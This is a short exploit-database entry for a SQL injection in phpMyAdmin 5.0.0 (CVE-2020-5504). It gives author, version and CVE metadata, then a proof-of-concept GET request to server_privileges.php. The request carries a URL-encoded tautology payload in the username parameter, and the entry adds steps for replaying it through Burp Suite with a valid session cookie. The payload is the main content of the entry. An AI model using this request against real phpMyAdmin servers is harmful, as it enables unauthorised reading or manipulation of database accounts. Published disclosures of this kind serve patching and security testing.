# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # - The attacker must have a valid MySQL account to access the server. Steps to Reproduce Log in phpmyadmin. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie. Observe the result.
Credits and Partners
All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
